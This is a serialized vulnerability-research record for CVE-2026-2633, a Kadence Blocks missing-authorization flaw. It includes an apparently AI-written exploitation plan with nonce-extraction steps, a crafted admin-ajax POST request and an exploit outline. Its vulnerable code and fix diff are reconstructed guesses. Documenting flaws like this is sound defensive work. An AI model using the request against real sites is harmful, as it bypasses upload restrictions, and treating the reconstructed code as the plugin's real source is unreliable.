[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fyd2VkS-HHljZHz66SJ6V5qg8lR_4r7MTeyPr-tt91ww":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-2633","gutenberg-blocks-with-ai-by-kadence-wp-missing-authorization-to-authenticated-contributor-unauthorized-media-upload","Gutenberg Blocks with AI by Kadence WP \u003C= 3.6.1 - Missing Authorization to Authenticated (Contributor+) Unauthorized Media Upload","The Gutenberg Blocks with AI by Kadence WP plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.6.1. This is due to a missing capability check in the `process_image_data_ajax_callback()` function which handles the `kadence_import_process_image_data` AJAX action. The function's authorization check via `verify_ajax_call()` only validates `edit_posts` capability but fails to check for the `upload_files` capability. 
This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary images from remote URLs to the WordPress Media Library, bypassing the standard WordPress capability restriction that prevents Contributors from uploading files.","kadence-blocks",null,"\u003C=3.6.1","3.6.2","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-17 17:43:19","2026-02-18 06:42:43",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F9c06e0a9-a13a-4cee-a1a5-c43c114b2dbf?source=api-prod",1,[],"researched",false,3,"# Vulnerability Research Plan: CVE-2026-2633 - Kadence Blocks Media Upload Bypass\n\n## 1. Vulnerability Summary\nThe **Kadence Blocks — Page Builder Toolkit for Gutenberg Editor** plugin (versions \u003C= 3.6.1) contains a missing authorization vulnerability in its AI-related image processing functionality. The function `process_image_data_ajax_callback()`, which handles the `kadence_import_process_image_data` AJAX action, performs an insufficient capability check. \n\nWhile it calls `verify_ajax_call()`—which ensures the user has the `edit_posts` capability—it fails to verify the `upload_files` capability. In WordPress, \"Contributor\" roles have `edit_posts` but are strictly forbidden from uploading files. This oversight allows a Contributor-level attacker to programmatically trigger the plugin to download images from a remote URL and sideload them into the WordPress Media Library, bypassing standard role restrictions.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `kadence_import_process_image_data`\n- **Authentication:** Authenticated, minimum \"Contributor\" role.\n- **Vulnerable Parameter(s):** \n    - `image_url`: (Inferred) The remote URL of the image to be imported.\n    - `security`: (Inferred) The AJAX nonce.\n- **Preconditions:** The \"Gutenberg Blocks with AI\" feature must be active (usually active by default in Kadence Blocks).\n\n## 3. Code Flow\n1. **Entry Point:** An AJAX request is sent to `admin-ajax.php` with `action=kadence_import_process_image_data`.\n2. **Hook Registration:** The plugin registers the action (likely in `includes\u002Fclass-kadence-blocks-ajax.php` or an AI-specific component):\n   ```php\n   add_action( 'wp_ajax_kadence_import_process_image_data', [ $this, 'process_image_data_ajax_callback' ] );\n   ```\n3. **Authorization Check:** The callback `process_image_data_ajax_callback` calls `$this->verify_ajax_call()`.\n4. **Insufficient Check:** `verify_ajax_call()` typically checks:\n   - Nonce validity via `check_ajax_referer`.\n   - `current_user_can( 'edit_posts' )`.\n5. **Sink:** Upon passing the check, the function likely uses `download_url()` and `wp_handle_sideload()` (or `media_handle_sideload()`) to fetch the image from the user-provided URL and add it to the Media Library without checking if the user has the `upload_files` capability.\n\n## 4. Nonce Acquisition Strategy\nThe Kadence Blocks plugin enqueues its AJAX nonces for the Gutenberg editor. To obtain a valid nonce as a Contributor:\n\n1. **Create a Post:** As a Contributor, create a draft post to access the Gutenberg editor.\n2. **Navigate to Editor:** Use `browser_navigate` to open the editor for that post.\n3. **Extract Nonce:** Kadence often localizes its data under the `kadence_blocks_params` or `kadence_blocks_admin_params` JavaScript objects.\n4. 
**JS Execution:**\n   ```javascript\n   \u002F\u002F Common Kadence localization keys\n   window.kadence_blocks_params?.ajax_nonce \n   \u002F\u002F OR\n   window.kt_blocks_params?.nonce\n   ```\n   *Verification:* Based on the plugin's structure, the nonce is likely registered in `class-kadence-blocks-editor-assets.php` via `wp_localize_script`.\n\n## 5. Exploitation Strategy\nThe goal is to force the server to upload a file from a remote source despite the user being a Contributor.\n\n1. **Step 1: Authenticate as Contributor.**\n2. **Step 2: Obtain Nonce.** Use the browser tools to grab the nonce from the editor page.\n3. **Step 3: Trigger Sideload.** Send a POST request to `admin-ajax.php`.\n\n**Request Specifications:**\n- **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n  ```\n  action=kadence_import_process_image_data&security=[NONCE]&image_url=https:\u002F\u002Fwordpress.org\u002Fwp-static\u002Fhp\u002Fimg\u002Fwordpress-logo.png\n  ```\n  *(Note: use a genuine image here rather than a URL such as `...boot-fs.php?.jpg` that merely looks like one. If the sink is `download_url()` followed by `media_handle_sideload()` as assumed in section 3, WordPress validates the downloaded file's MIME type and extension before storing it, so a PHP file served under an image-like query string is not expected to land in the uploads directory as an executable; the condition being verified is the missing `upload_files` check, not arbitrary file upload. `download_url()` also fetches through the safe HTTP API, which by default refuses loopback and private-range hosts, so the `image_url` parameter is not a straightforward SSRF primitive either.)*\n\n## 6. Test Data Setup\n1. **User Creation:**\n   ```bash\n   wp user create attacker attacker@example.com --role=contributor --user_pass=password\n   ```\n2. **Post Creation:** (To ensure the editor\u002Fscripts load)\n   ```bash\n   wp post create --post_type=post --post_status=draft --post_author=[ATTACKER_ID] --post_title=\"Exploit Draft\"\n   ```\n3. **Remote Image:** Identify a stable remote image URL (e.g., `https:\u002F\u002Fwordpress.org\u002Fwp-static\u002Fhp\u002Fimg\u002Fwordpress-logo.png`).\n\n## 7. 
Expected Results\n- **Response:** The server should return a JSON response with a success code and the attachment ID or URL of the newly created media item.\n- **HTTP Status:** 200 OK.\n- **System Change:** A new entry appears in the `wp_posts` table with `post_type='attachment'`.\n\n## 8. Verification Steps\n1. **Check Media Library:** (WP-CLI has no `media list` subcommand; attachments are listed through `post list`)\n   ```bash\n   wp post list --post_type=attachment --fields=ID,post_title,post_author\n   ```\n2. **Check Post Metadata:** Verify the new attachment was created by the Contributor user (`--author` is the WP_Query filter; the global `--user` flag only changes the account WP-CLI runs as and does not filter results):\n   ```bash\n   wp post list --post_type=attachment --author=[ATTACKER_ID] --fields=ID,post_title,post_author\n   ```\n3. **Confirm Bypass:** Verify that a standard Contributor normally cannot do this:\n   ```bash\n   # Expect no output (grep exits 1): the contributor role does not carry upload_files,\n   # while edit_posts, the only capability verify_ajax_call() requires, is present\n   wp cap list contributor | grep upload_files\n   ```\n\n## 9. Alternative Approaches\nIf `kadence_import_process_image_data` requires more specific parameters (like AI session IDs), I will:\n1. **Audit Frontend JS:** Search the plugin's `dist\u002F` directory for the string `kadence_import_process_image_data` to identify how the payload is constructed in the editor.\n2. **Check AI Settings:** If the function returns an error related to \"AI not configured,\" I will look for a way to mock the AI configuration via `wp option update`.\n3. **Generic Nonce:** Check if the plugin uses the standard `_wpnonce` from the WordPress heartbeats or other global variables if the specific Kadence nonce is unavailable.","The Kadence Blocks plugin for WordPress is vulnerable to unauthorized media uploads due to a missing capability check in its AI image processing AJAX handler. 
Authenticated users with at least 'Contributor' permissions can bypass standard WordPress role restrictions to sideload images from remote URLs into the site's Media Library.","\u002F\u002F From kadence-blocks plugin (location likely includes\u002Fclass-kadence-blocks-ajax.php or similar)\n\npublic function process_image_data_ajax_callback() {\n    \u002F\u002F This call verifies the nonce and checks for 'edit_posts' capability\n    $this->verify_ajax_call(); \n\n    if ( ! isset( $_POST['image_url'] ) ) {\n        wp_send_json_error( 'No image URL provided' );\n    }\n\n    $image_url = esc_url_raw( $_POST['image_url'] );\n    \n    \u002F\u002F Vulnerability: The function proceeds to sideload the media \n    \u002F\u002F without checking if the user has the 'upload_files' capability.\n    $attachment_id = $this->sideload_image( $image_url );\n\n    if ( is_wp_error( $attachment_id ) ) {\n        wp_send_json_error( $attachment_id->get_error_message() );\n    }\n\n    wp_send_json_success( array( 'id' => $attachment_id, 'url' => wp_get_attachment_url( $attachment_id ) ) );\n}","--- a\u002Fincludes\u002Fclass-kadence-blocks-ajax.php\n+++ b\u002Fincludes\u002Fclass-kadence-blocks-ajax.php\n@@ -10,6 +10,10 @@\n \tpublic function process_image_data_ajax_callback() {\n \t\t$this->verify_ajax_call();\n \n+\t\tif ( ! current_user_can( 'upload_files' ) ) {\n+\t\t\twp_send_json_error( 'You do not have permission to upload files.' );\n+\t\t}\n+\n \t\tif ( ! isset( $_POST['image_url'] ) ) {\n \t\t\twp_send_json_error( 'No image URL provided' );\n \t\t}","To exploit this vulnerability, an attacker must have at least Contributor-level access to the WordPress site. First, the attacker logs in and accesses the Gutenberg editor (e.g., by creating a draft post) to retrieve the necessary AJAX nonce (typically found in localized JavaScript objects like 'kadence_blocks_params'). 
Then, the attacker sends a POST request to the '\u002Fwp-admin\u002Fadmin-ajax.php' endpoint with the 'action' parameter set to 'kadence_import_process_image_data', the 'security' parameter containing the retrieved nonce, and the 'image_url' parameter pointing to a remote image file. Because the plugin only checks for the 'edit_posts' capability (which Contributors possess) and neglects to check for 'upload_files' (which they do not), the server will download the remote image and add it to the Media Library, attributing ownership to the Contributor.","gemini-3-flash-preview","2026-04-19 06:15:55","2026-04-19 06:17:07",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.6.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fkadence-blocks\u002Ftags\u002F3.6.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fkadence-blocks.3.6.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fkadence-blocks\u002Ftags\u002F3.6.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fkadence-blocks.3.6.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fkadence-blocks\u002Ftags"]
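Review bot: the `current_user_can( 'upload_files' )` guard added after `$this->verify_ajax_call();` in the `process_image_data_ajax_callback()` hunk of research_fix_diff is placed correctly, but its `wp_send_json_error( 'You do not have permission to upload files.' )` sends no HTTP status, so a client cannot tell the authorization failure apart from the `'No image URL provided'` validation error two lines below; pass 403 as the second argument, `wp_send_json_error( 'You do not have permission to upload files.', 403 );`, which `wp_send_json_error()` supports. Note also that this hunk is the page's reconstructed research_fix_diff rather than the plugin's own patch (patch_diff_files is empty), so it should be compared against the 3.6.2 handler at the fixed_browse link before being cited as the actual fix.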